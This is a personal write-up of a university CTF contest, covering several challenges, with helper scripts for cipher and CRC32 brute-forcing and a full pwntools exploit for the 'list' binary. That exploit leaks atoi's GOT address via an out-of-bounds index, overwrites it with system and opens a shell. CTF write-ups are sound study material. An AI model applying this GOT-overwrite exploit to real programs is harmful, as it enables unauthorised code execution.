3rd Shanghai University Student Cyber Security Contest - Summary

A few notes and reflections on the contest, written for myself~

The contest ended a week ago. I'm only writing this now because I've been lying in a hospital bed until now. Still, this one is worth writing up: every contest I entered over the past few months was a waste of time, and this one finally taught me something.

Some Words

I didn't look at this one. I know someone dumped the table names with SQLmap, though I don't know whether they got all the data in the end. Watching them, I think I need to write more general-purpose scripts in normal times; that would make things much faster.

Welcome To My Blog

A really fun problem. Ningning said it was an instant solve, so I tried it too: I saw an action= parameter at the end of the URL, couldn't help appending flag, and then... a 200~

Step By Step

robots.txt gave away the location of the source. The download was encrypted (phpjiami). As a pay-to-win player (runs away), I Baidu'd it and spent 7.5 yuan to get it decoded. I still had 3 yuan left, but forgot the account. Apparently the organizers later said you didn't have to pay, but by then we had already solved it (small cry). Once decoded it's simple: brute-force the random seed and then some weak-typing tricks.
OK then, here is a free script: http://sec2hack.com/web/phpjiami-decode.html

juckcode

Character-by-character brute force: don't forget this approach in future (yes, I didn't look at this one..)

classical

I thought it was Enigma. Later a junior tried base64-encoding the flag and then shifting it, which looked very similar, so that was it.
(If the offline round has no network and that frequency-analysis website is unreachable, we're done for; that scared me into looking for an offline script right away.)
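An offline stand-in for that website, added here as an example and not code from the original post: it assumes the "shift" is a rotation within the standard base64 alphabet (other variants, such as rotating only letters, would need a different `shift_b64`), tries all 64 shifts, decodes each, and ranks the results by how much of the decoded output is printable ASCII, with an optional known fragment such as `b"flag{"` to settle ties. The sample ciphertext is constructed inside the script from a made-up flag.

```python
import base64
import binascii
import string

# Standard base64 alphabet in table order, so a "shift" is a rotation within it
B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def shift_b64(text, k):
    """Rotate every base64 symbol k places within the alphabet; '=' padding is left alone."""
    out = []
    for ch in text:
        if ch in B64_ALPHABET:
            out.append(B64_ALPHABET[(B64_ALPHABET.index(ch) + k) % 64])
        else:
            out.append(ch)
    return "".join(out)


def printable_ratio(blob):
    """Share of bytes that are printable ASCII (plus tab/CR/LF): a crude offline frequency check."""
    if not blob:
        return 0.0
    ok = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(blob)


def crack_shifted_b64(cipher):
    """Try all 64 shifts, base64-decode each, and return (score, shift, plaintext) tuples, best first."""
    results = []
    for k in range(64):
        candidate = shift_b64(cipher, k)
        try:
            plain = base64.b64decode(candidate)
        except (binascii.Error, ValueError):
            continue  # a rotation that breaks decoding is not a candidate
        results.append((printable_ratio(plain), k, plain))
    # highest score first; among equal scores prefer the smaller shift
    results.sort(key=lambda r: (r[0], -r[1]), reverse=True)
    return results


def best_guess(cipher, marker=None):
    """Top candidate; if a known fragment (e.g. b'flag{') is given, candidates containing it win outright."""
    ranked = crack_shifted_b64(cipher)
    if marker is not None:
        hits = [r for r in ranked if marker in r[2]]
        if hits:
            return hits[0]
    return ranked[0]


# Constructed sample (not contest data): base64 of a made-up flag, rotated by 13 within the alphabet
SAMPLE_PLAINTEXT = b"flag{shift_the_base64_alphabet}"
SAMPLE_CIPHER = shift_b64(base64.b64encode(SAMPLE_PLAINTEXT).decode(), 13)

if __name__ == "__main__":
    for score, k, plain in crack_shifted_b64(SAMPLE_CIPHER)[:5]:
        print(f"shift={k:2d} printable={score:.2f} {plain!r}")
```

Run it and the shift that undoes the rotation (51, i.e. -13 mod 64) comes out on top with every decoded byte printable; the other 63 shifts decode to mostly high-bit garbage, which is the whole point of scoring by printability when no online tool is reachable.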

rrrsa

Not solved by me. All I'll say is my teammates need to brush up a bit; otherwise we might have gotten in this time. It was solved one minute after the deadline~

list

I can only say my skills aren't good enough. I found the low-address read/write and the atoi-to-shell idea very early, but couldn't find a trampoline pointer anywhere and got stuck there. Only after reading the write-up did I remember that .rela.plt entries point into the GOT. Argh!

Analysis

The exploit relies on these three functions:



stringCount can be pushed out of bounds downward (the index goes negative), and stringTables holds addresses (pointers that the program reads and writes through), so to reach a chosen target you need a pointer to it sitting somewhere below the table. That is where I got stuck at the time.

Exploitation

Who would have thought: the r_offset field of each .rela.plt entry points into the GOT, so by landing the index on that field we can leak an address through it and also write an address through it. Use readelf to get the entry's address:

```
➜  Downloads readelf -x .rela.plt list 

Hex dump of section '.rela.plt':
0x00400510 18206000 00000000 07000000 01000000 . `.............
0x00400520 00000000 00000000 20206000 00000000 ........ `.....
0x00400530 07000000 02000000 00000000 00000000 ................
0x00400540 28206000 00000000 07000000 03000000 ( `.............
0x00400550 00000000 00000000 30206000 00000000 ........0 `.....
0x00400560 07000000 04000000 00000000 00000000 ................
0x00400570 38206000 00000000 07000000 07000000 8 `.............
0x00400580 00000000 00000000 40206000 00000000 ........@ `.....
0x00400590 07000000 08000000 00000000 00000000 ................
0x004005a0 48206000 00000000 07000000 09000000 H `.............
0x004005b0 00000000 00000000 ........

➜ Downloads
```
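Reading the entry address off a hex dump is error-prone, so here is an added example (not from the original post or the challenge) that parses the dump above as Elf64_Rela records and finds the word that points at a given GOT slot. The section bytes are transcribed from the readelf output; the GOT slot 0x602040 is taken to be atoi's because the exploit below targets the entry at 0x400588 (with a live binary you would take it from pwntools' `ELF('list').got['atoi']` instead). It also computes how many index decrements move `&stringTables[index]` onto that entry, which is the arithmetic the exploit does by hand.

```python
import struct

R_X86_64_JUMP_SLOT = 7
RELA_ENTRY_SIZE = 24   # sizeof(Elf64_Rela): r_offset, r_info, r_addend, all 8 bytes

# Bytes of .rela.plt, transcribed from the readelf -x dump above (section starts at 0x400510)
RELA_PLT_ADDR = 0x400510
RELA_PLT_HEX = (
    "18206000000000000700000001000000"
    "00000000000000002020600000000000"
    "07000000020000000000000000000000"
    "28206000000000000700000003000000"
    "00000000000000003020600000000000"
    "07000000040000000000000000000000"
    "38206000000000000700000007000000"
    "00000000000000004020600000000000"
    "07000000080000000000000000000000"
    "48206000000000000700000009000000"
    "0000000000000000"
)


def parse_rela(blob, section_addr):
    """Split a little-endian x86-64 .rela.plt section into Elf64_Rela entries, recording where each lives."""
    entries = []
    usable = len(blob) - len(blob) % RELA_ENTRY_SIZE   # ignore a trailing partial record
    for off in range(0, usable, RELA_ENTRY_SIZE):
        r_offset, r_info, r_addend = struct.unpack_from("<QQq", blob, off)
        entries.append({
            "addr": section_addr + off,     # address of the entry == address of its r_offset field
            "r_offset": r_offset,           # the GOT slot this relocation fills in
            "sym": r_info >> 32,            # ELF64_R_SYM(r_info)
            "type": r_info & 0xFFFFFFFF,    # ELF64_R_TYPE(r_info)
            "addend": r_addend,
        })
    return entries


def find_pointer_to(entries, got_slot):
    """Address of an 8-byte word inside .rela.plt whose value is got_slot: a ready-made pointer to that GOT entry."""
    for e in entries:
        if e["type"] == R_X86_64_JUMP_SLOT and e["r_offset"] == got_slot:
            return e["addr"]
    return None


def steps_below(table_addr, target_addr):
    """Number of index decrements so that &table[index] == target_addr, for a table of 8-byte pointers."""
    delta = table_addr - target_addr
    if delta < 0 or delta % 8:
        raise ValueError("target must be 8-byte aligned and below the table")
    return delta // 8


if __name__ == "__main__":
    entries = parse_rela(bytes.fromhex(RELA_PLT_HEX), RELA_PLT_ADDR)
    for e in entries:
        print(f"entry @ {e['addr']:#x}: r_offset={e['r_offset']:#x} sym={e['sym']} type={e['type']}")
    # Assumed from the exploit below: 0x602040 is atoi's GOT slot (on a live target use elf.got['atoi'])
    ptr = find_pointer_to(entries, 0x602040)
    print(f"pointer to GOT slot 0x602040 lives at {ptr:#x}")
    print(f"decrements needed from stringTables (0x602080): {steps_below(0x602080, ptr)}")
```

The dump holds seven JUMP_SLOT relocations; the sixth sits at 0x400588 and its r_offset is 0x602040, which is why the exploit walks the index down (0x602080 - 0x400588) / 8 = 263007 times before reading or writing through it.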

With that, the exploit can be written:

```python
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

elf = ELF('list')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p = process('./list')
atoiRelPltAddr = 0x400588      # atoi's .rela.plt entry; its r_offset field holds the address of atoi's GOT slot
stringTables = 0x602080        # the program's table of string pointers
stringCount = 0                # current index into stringTables

## Low-address read: decrement the index `count` times, then print the string the entry points to
def readAddr(count):
    for i in range(count):
        p.recv()
        p.sendline(b'4')       # option 4: index - 1
        if i % 10000 == 0:
            print(i)
    print(p.recv())
    p.sendline(b'2')           # option 2: print stringTables[index]
    lala = p.recv(8)
    # the leaked address is followed by a newline; keep the bytes before it and zero-pad to 8
    lala = lala[:lala.find(b'\n')] + b'\x00' * (len(lala) - lala.find(b'\n'))
    print(lala)
    return u64(lala)

## Low-address write: decrement the index `count` times, then overwrite the string the entry points to
def writeAddr(data, count):
    for i in range(count):
        p.recv()
        p.sendline(b'4')
    # gdb.attach(p)
    p.sendline(b'3')           # option 3: write into stringTables[index]
    p.send(p64(data))

## Leak atoi's address: walk the index down until &stringTables[index] == atoiRelPltAddr,
## so that the r_offset stored there (atoi's GOT slot) is what gets read through
stringCount = (stringTables - atoiRelPltAddr) // 8 - stringCount
print(stringCount)
atoiAddr = readAddr(stringCount)
print(hex(atoiAddr))

## Compute system from the libc offsets
systemAddr = atoiAddr - (libc.symbols['atoi'] - libc.symbols['system'])
print(hex(systemAddr))

## Overwrite atoi's GOT slot with system (the index is already in place, so no more decrements)
writeAddr(systemAddr, 0)

## Call it: the next menu input goes through atoi(), which is now system()
p.send(b'/bin/sh\0')
p.interactive()
```

Result:

p200

The hint made it obvious this was a UAF, but I got cold feet as soon as I saw C++ code. I knew the problem was easy and still didn't dare to try it. So annoying!

登机牌 (Boarding Pass)

This problem taught me to pay attention to every detail given, and that the website matters too: apparently only that one site could recognize it successfully!

clemency

Sigh. I knew this was the legendary middle-endian, 9-bit architecture, but I fell into a trap: I assumed the program would read flag.enc at run time and decrypt it, so I debugged it in the emulator and read through the instruction set, and still didn't get it. So frustrating. Later I saw the write-up: IDA alone was enough to get it out.

Traffic Analysis

First time I've run into this kind of traffic analysis; a screen full of TLS is suspicious enough on its own. According to the write-up it goes like this:
TLS exists to encrypt data in transit, so a packet capture alone can't give you the password. But the ftp-data stream carries the keys for each session; import them (in Wireshark, under the TLS protocol preferences, the (Pre)-Master-Secret log filename) and the important conversation decrypts. One of the transfers is a zip; export it, and inside is an audio file whose noise at the end shows the password in the spectrogram or the like. Use it to unpack the flag.zip you extracted and you get the flag:

crc32

Not from this contest; a teammate ran into it today. Python was too slow, so I found a C implementation, made a few changes, and am recording it here~

```c
#include <string.h>
#include <stdio.h>

// From: https://github.com/ETrun/crc32/blob/master/crc32.c
static unsigned long Crc32_ComputeBuf(const void *buf, size_t bufLen) {
    static const unsigned long crcTable[256] = {
        0x00000000,0x77073096,0xEE0E612C,0x990951BA,0x076DC419,0x706AF48F,0xE963A535,
        0x9E6495A3,0x0EDB8832,0x79DCB8A4,0xE0D5E91E,0x97D2D988,0x09B64C2B,0x7EB17CBD,
        0xE7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0xF3B97148,0x84BE41DE,0x1ADAD47D,
        0x6DDDE4EB,0xF4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0xFD62F97A,0x8A65C9EC,
        0x14015C4F,0x63066CD9,0xFA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0xD56041E4,
        0xA2677172,0x3C03E4D1,0x4B04D447,0xD20D85FD,0xA50AB56B,0x35B5A8FA,0x42B2986C,
        0xDBBBC9D6,0xACBCF940,0x32D86CE3,0x45DF5C75,0xDCD60DCF,0xABD13D59,0x26D930AC,
        0x51DE003A,0xC8D75180,0xBFD06116,0x21B4F4B5,0x56B3C423,0xCFBA9599,0xB8BDA50F,
        0x2802B89E,0x5F058808,0xC60CD9B2,0xB10BE924,0x2F6F7C87,0x58684C11,0xC1611DAB,
        0xB6662D3D,0x76DC4190,0x01DB7106,0x98D220BC,0xEFD5102A,0x71B18589,0x06B6B51F,
        0x9FBFE4A5,0xE8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0xE10E9818,0x7F6A0DBB,
        0x086D3D2D,0x91646C97,0xE6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0xF262004E,
        0x6C0695ED,0x1B01A57B,0x8208F4C1,0xF50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,
        0xFCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0xFBD44C65,0x4DB26158,0x3AB551CE,
        0xA3BC0074,0xD4BB30E2,0x4ADFA541,0x3DD895D7,0xA4D1C46D,0xD3D6F4FB,0x4369E96A,
        0x346ED9FC,0xAD678846,0xDA60B8D0,0x44042D73,0x33031DE5,0xAA0A4C5F,0xDD0D7CC9,
        0x5005713C,0x270241AA,0xBE0B1010,0xC90C2086,0x5768B525,0x206F85B3,0xB966D409,
        0xCE61E49F,0x5EDEF90E,0x29D9C998,0xB0D09822,0xC7D7A8B4,0x59B33D17,0x2EB40D81,
        0xB7BD5C3B,0xC0BA6CAD,0xEDB88320,0x9ABFB3B6,0x03B6E20C,0x74B1D29A,0xEAD54739,
        0x9DD277AF,0x04DB2615,0x73DC1683,0xE3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,
        0xE40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0xF00F9344,0x8708A3D2,0x1E01F268,
        0x6906C2FE,0xF762575D,0x806567CB,0x196C3671,0x6E6B06E7,0xFED41B76,0x89D32BE0,
        0x10DA7A5A,0x67DD4ACC,0xF9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0xD6D6A3E8,
        0xA1D1937E,0x38D8C2C4,0x4FDFF252,0xD1BB67F1,0xA6BC5767,0x3FB506DD,0x48B2364B,
        0xD80D2BDA,0xAF0A1B4C,0x36034AF6,0x41047A60,0xDF60EFC3,0xA867DF55,0x316E8EEF,
        0x4669BE79,0xCB61B38C,0xBC66831A,0x256FD2A0,0x5268E236,0xCC0C7795,0xBB0B4703,
        0x220216B9,0x5505262F,0xC5BA3BBE,0xB2BD0B28,0x2BB45A92,0x5CB36A04,0xC2D7FFA7,
        0xB5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0xEC63F226,0x756AA39C,0x026D930A,
        0x9C0906A9,0xEB0E363F,0x72076785,0x05005713,0x95BF4A82,0xE2B87A14,0x7BB12BAE,
        0x0CB61B38,0x92D28E9B,0xE5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0xF1D4E242,
        0x68DDB3F8,0x1FDA836E,0x81BE16CD,0xF6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,
        0xFF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0xF862AE69,0x616BFFD3,0x166CCF45,
        0xA00AE278,0xD70DD2EE,0x4E048354,0x3903B3C2,0xA7672661,0xD06016F7,0x4969474D,
        0x3E6E77DB,0xAED16A4A,0xD9D65ADC,0x40DF0B66,0x37D83BF0,0xA9BCAE53,0xDEBB9EC5,
        0x47B2CF7F,0x30B5FFE9,0xBDBDF21C,0xCABAC28A,0x53B39330,0x24B4A3A6,0xBAD03605,
        0xCDD70693,0x54DE5729,0x23D967BF,0xB3667A2E,0xC4614AB8,0x5D681B02,0x2A6F2B94,
        0xB40BBE37,0xC30C8EA1,0x5A05DF1B,0x2D02EF8D
    };
    unsigned long crc32 = 0xFFFFFFFF;
    unsigned char *byteBuf;
    size_t i;

    byteBuf = (unsigned char*)buf;
    for (i = 0; i < bufLen; i++) {
        crc32 = (crc32 >> 8) ^ crcTable[(crc32 ^ byteBuf[i]) & 0xFF];
    }
    return crc32 ^ 0xFFFFFFFF;
}

// Character set the 5-byte fragments are drawn from
static char *charSet = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_@\n ";


int main() {
    // Target CRC32 values, one per 5-byte fragment
    unsigned long crc32[] = { 1606238046, 1943531056, 3598719407L, 2578797435L, 1405086858, 2143805016, 3234701029L, 3224637410L,
        2346013297L, 1146766327, 4038678768L, 3119445409L, 2111148220, 383413051, 2853461348L, 3176759361L, 1852520927,
        3083243303L, 2151747034L, 1392140456, 544449252, 1871340857, 574988077, 3459049483L, 2786065872L, 3888485555L,
        1716930793, 1933746678, 3178216769L, 3774357278L, 622718466, 1488109481, 525106857, 3123386181L, 3472027048L,
        616379830, 3728848209L, 1358333123, 1852520927, 3096466191L, 622718466
    };

    char tmp[6] = "";
    int len = strlen(charSet);
    // Walk the targets from last to first; for each, try every 5-character string over charSet
    for (int h = sizeof(crc32) / sizeof(unsigned long) - 1; h >= 0; h--) {
        for (int a = 0; a < len; a++) {
            tmp[0] = charSet[a];
            for (int b = 0; b < len; b++) {
                tmp[1] = charSet[b];
                for (int c = 0; c < len; c++) {
                    tmp[2] = charSet[c];
                    for (int d = 0; d < len; d++) {
                        tmp[3] = charSet[d];
                        for (int e = 0; e < len; e++) {
                            tmp[4] = charSet[e];
                            if (Crc32_ComputeBuf(tmp, strlen(tmp)) == crc32[h]) {
                                printf("%s", tmp);
                                //goto label; // if collisions are possible, leave this commented out so every match is printed
                            }
                        }
                    }
                }
            }
        }
label: ;
        printf("\n");
    }
    return 0;
}
```